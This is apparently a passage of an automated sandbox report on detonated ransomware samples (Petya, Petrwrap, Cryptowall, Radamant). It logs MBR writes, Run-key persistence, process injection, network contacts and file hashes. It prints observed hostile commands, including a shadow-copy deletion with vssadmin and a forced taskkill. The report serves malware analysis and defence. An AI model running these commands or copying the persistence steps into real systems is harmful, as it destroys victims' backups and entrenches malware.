File created C:\Windows\assembly\Desktop.ini C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\svchost.exe N/A
File opened for modification C:\Windows\assembly\Desktop.ini C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\svchost.exe N/A
File opened for modification C:\Windows\assembly C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\svchost.exe N/A

Enumerates physical storage devices

Processes

C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\svchost.exe"

Network

Country Destination Domain Proto

Files

memory/1448-0-0x00007FFB0C8C5000-0x00007FFB0C8C6000-memory.dmp

memory/1448-1-0x00007FFB0C610000-0x00007FFB0CFB1000-memory.dmp

memory/1448-2-0x000000001D000000-0x000000001D4CE000-memory.dmp

memory/1448-3-0x000000001BE40000-0x000000001BEDC000-memory.dmp

memory/1448-4-0x000000001BF60000-0x000000001BFC2000-memory.dmp

memory/1448-5-0x000000001B880000-0x000000001B888000-memory.dmp

memory/1448-6-0x000000001DB00000-0x000000001DB52000-memory.dmp

memory/1448-14-0x00007FFB0C610000-0x00007FFB0CFB1000-memory.dmp

memory/1448-15-0x00007FFB0C8C5000-0x00007FFB0C8C6000-memory.dmp

memory/1448-16-0x00007FFB0C610000-0x00007FFB0CFB1000-memory.dmp

memory/1448-17-0x00007FFB0C610000-0x00007FFB0CFB1000-memory.dmp

Analysis: behavioral27

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win7-20240508-en

Max time kernel

2s

Max time network

3s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\4c1dc737915d76b7ce579abddaba74ead6fdb5b519a1ea45308b8c49b950655c.exe"

Signatures

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\4c1dc737915d76b7ce579abddaba74ead6fdb5b519a1ea45308b8c49b950655c.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\4c1dc737915d76b7ce579abddaba74ead6fdb5b519a1ea45308b8c49b950655c.exe

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\4c1dc737915d76b7ce579abddaba74ead6fdb5b519a1ea45308b8c49b950655c.exe"

Network

N/A

Files

memory/328-1-0x0000000000400000-0x00000000004CB000-memory.dmp

memory/328-0-0x000000000040E000-0x000000000041B000-memory.dmp

Analysis: behavioral28

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:00

Platform

win10v2004-20240611-en

Max time kernel

3s

Max time network

12s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\4c1dc737915d76b7ce579abddaba74ead6fdb5b519a1ea45308b8c49b950655c.exe"

Signatures

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\4c1dc737915d76b7ce579abddaba74ead6fdb5b519a1ea45308b8c49b950655c.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\4c1dc737915d76b7ce579abddaba74ead6fdb5b519a1ea45308b8c49b950655c.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\4c1dc737915d76b7ce579abddaba74ead6fdb5b519a1ea45308b8c49b950655c.exe

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\4c1dc737915d76b7ce579abddaba74ead6fdb5b519a1ea45308b8c49b950655c.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp

Files

memory/1896-0-0x000000000040E000-0x000000000041B000-memory.dmp

memory/1896-1-0x0000000000400000-0x00000000004CB000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win7-20240611-en

Max time kernel

1786s

Max time network

1803s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe"

Signatures

Deletes shadow copies

ransomware defense_evasion impact execution

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d6587785.exe C:\Windows\syswow64\explorer.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Windows\CurrentVersion\Run\d658778 = "C:\\d6587785\\d6587785.exe" C:\Windows\syswow64\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\*658778 = "C:\\d6587785\\d6587785.exe" C:\Windows\syswow64\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Windows\CurrentVersion\Run\d6587785 = "C:\\Users\\Admin\\AppData\\Roaming\\d6587785.exe" C:\Windows\syswow64\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\*6587785 = "C:\\Users\\Admin\\AppData\\Roaming\\d6587785.exe" C:\Windows\syswow64\explorer.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-addr.es N/A N/A
N/A myexternalip.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2960 set thread context of 2404 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\syswow64\vssadmin.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe N/A
N/A N/A C:\Windows\syswow64\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2960 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe
PID 2404 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe C:\Windows\syswow64\explorer.exe
PID 3064 wrote to memory of 2672 N/A C:\Windows\syswow64\explorer.exe C:\Windows\syswow64\svchost.exe
PID 3064 wrote to memory of 2704 N/A C:\Windows\syswow64\explorer.exe C:\Windows\syswow64\vssadmin.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe"

C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe"

C:\Windows\syswow64\explorer.exe

"C:\Windows\syswow64\explorer.exe"

C:\Windows\syswow64\svchost.exe

-k netsvcs

C:\Windows\syswow64\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-addr.es udp
NL 188.165.164.184:80 ip-addr.es tcp
US 8.8.8.8:53 myexternalip.com udp
US 34.117.118.44:80 myexternalip.com tcp
FR 94.247.28.156:8081 tcp
FR 91.121.12.127:4141 tcp
US 209.148.85.151:8080 tcp
FR 94.247.31.19:8080 tcp
FR 94.247.28.26:2525 tcp

Files

memory/2404-13-0x0000000000400000-0x0000000000425000-memory.dmp

memory/2404-12-0x0000000000400000-0x0000000000425000-memory.dmp

memory/2404-10-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2404-8-0x0000000000400000-0x0000000000425000-memory.dmp

memory/2404-6-0x0000000000400000-0x0000000000425000-memory.dmp

memory/2404-4-0x0000000000400000-0x0000000000425000-memory.dmp

memory/2404-2-0x0000000000400000-0x0000000000425000-memory.dmp

memory/2404-0-0x0000000000400000-0x0000000000425000-memory.dmp

memory/2404-15-0x0000000000400000-0x0000000000425000-memory.dmp

memory/3064-14-0x0000000000080000-0x00000000000A5000-memory.dmp

memory/2672-20-0x0000000000080000-0x00000000000A5000-memory.dmp

memory/2960-22-0x0000000000400000-0x00000000037E7000-memory.dmp

Analysis: behavioral30

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win10v2004-20240611-en

Max time kernel

1790s

Max time network

1177s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Radamant\Ransomware.Radamant\DUMP_00A10000-00A1D000.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Radamant\Ransomware.Radamant\DUMP_00A10000-00A1D000.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\DirectX.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\DirectX = "C:\\Users\\Admin\\AppData\\Roaming\\DirectX.exe" C:\Users\Admin\AppData\Roaming\DirectX.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DirectX = "C:\\Users\\Admin\\AppData\\Roaming\\DirectX.exe" C:\Users\Admin\AppData\Roaming\DirectX.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.dyndns.org N/A N/A

Enumerates physical storage devices

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Radamant\Ransomware.Radamant\DUMP_00A10000-00A1D000.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Radamant\Ransomware.Radamant\DUMP_00A10000-00A1D000.exe

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Radamant\Ransomware.Radamant\DUMP_00A10000-00A1D000.exe"

C:\Users\Admin\AppData\Roaming\DirectX.exe

"C:\Users\Admin\AppData\Roaming\DirectX.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c aaa.bat

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im DUMP_00A10000-00A1D000.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 checkip.dyndns.org udp
BR 132.226.247.73:80 checkip.dyndns.org tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 tangotangocash.com udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 73.247.226.132.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 107.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp
US 8.8.8.8:53 95.16.208.104.in-addr.arpa udp
US 8.8.8.8:53 138.201.86.20.in-addr.arpa udp

Files

memory/2552-0-0x0000000000400000-0x0000000000419000-memory.dmp

C:\Users\Admin\AppData\Roaming\DirectX.exe

MD5 6152709e741c4d5a5d793d35817b4c3d
SHA1 05ae9c76f8f85ad2247c06d26a88bbbcfff4d62e
SHA256 2c4c8066a1a7dfdf42c57ff4f9016f1ba05bcb004ff8b0ffc0989165d2ad30e2
SHA512 1e5ebd53ac942b0f06f759f936efebeeb9a74062647cd978d5112720f772f607b12ee20c02ab838104a7a947fef2fde79b0db944286d8daf2e6e6d16e10b9390

memory/1888-61-0x0000000000400000-0x0000000000419000-memory.dmp

memory/2552-65-0x0000000000400000-0x0000000000419000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Radamant\Ransomware.Radamant\aaa.bat

MD5 2861e1b3a96bd68affe71c9c07142aae
SHA1 13cdf1d8667309b8e92e630c6026f1bc94b40845
SHA256 62a90c33cd71d3ecc13d6d002d1797e37042791819d1d24d3acbba53a4e834bb
SHA512 8f86a6f09e0a587cd533b1c3400d26196f7738972add27cbd34712eb85dc019f4c99f8406f1edbee8e31ed263fc7cd5f0c3fde7aa260a1c5ac820b00a7b117e8

memory/1888-67-0x0000000000400000-0x0000000000419000-memory.dmp

memory/1888-86-0x0000000000400000-0x0000000000419000-memory.dmp

Analysis: behavioral29

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win7-20240611-en

Max time kernel

810s

Max time network

1217s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Radamant\Ransomware.Radamant\DUMP_00A10000-00A1D000.exe"

Signatures

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\DirectX.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\DirectX = "C:\\Users\\Admin\\AppData\\Roaming\\DirectX.exe" C:\Users\Admin\AppData\Roaming\DirectX.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Windows\CurrentVersion\Run\DirectX = "C:\\Users\\Admin\\AppData\\Roaming\\DirectX.exe" C:\Users\Admin\AppData\Roaming\DirectX.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.dyndns.org N/A N/A

Enumerates physical storage devices

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2120 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Radamant\Ransomware.Radamant\DUMP_00A10000-00A1D000.exe C:\Users\Admin\AppData\Roaming\DirectX.exe
PID 2120 wrote to memory of 3036 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Radamant\Ransomware.Radamant\DUMP_00A10000-00A1D000.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 2856 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Radamant\Ransomware.Radamant\DUMP_00A10000-00A1D000.exe

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Radamant\Ransomware.Radamant\DUMP_00A10000-00A1D000.exe"

C:\Users\Admin\AppData\Roaming\DirectX.exe

"C:\Users\Admin\AppData\Roaming\DirectX.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c aaa.bat

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im DUMP_00A10000-00A1D000.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 checkip.dyndns.org udp
US 193.122.130.0:80 checkip.dyndns.org tcp
US 8.8.8.8:53 tangotangocash.com udp

Files

memory/2120-0-0x0000000000400000-0x0000000000419000-memory.dmp

\Users\Admin\AppData\Roaming\DirectX.exe

MD5 6152709e741c4d5a5d793d35817b4c3d
SHA1 05ae9c76f8f85ad2247c06d26a88bbbcfff4d62e
SHA256 2c4c8066a1a7dfdf42c57ff4f9016f1ba05bcb004ff8b0ffc0989165d2ad30e2
SHA512 1e5ebd53ac942b0f06f759f936efebeeb9a74062647cd978d5112720f772f607b12ee20c02ab838104a7a947fef2fde79b0db944286d8daf2e6e6d16e10b9390

memory/2120-11-0x0000000003C60000-0x0000000003C79000-memory.dmp

memory/2800-12-0x0000000000400000-0x0000000000419000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Radamant\Ransomware.Radamant\aaa.bat

MD5 2861e1b3a96bd68affe71c9c07142aae
SHA1 13cdf1d8667309b8e92e630c6026f1bc94b40845
SHA256 62a90c33cd71d3ecc13d6d002d1797e37042791819d1d24d3acbba53a4e834bb
SHA512 8f86a6f09e0a587cd533b1c3400d26196f7738972add27cbd34712eb85dc019f4c99f8406f1edbee8e31ed263fc7cd5f0c3fde7aa260a1c5ac820b00a7b117e8

memory/2120-22-0x0000000000400000-0x0000000000419000-memory.dmp

memory/2800-24-0x0000000000400000-0x0000000000419000-memory.dmp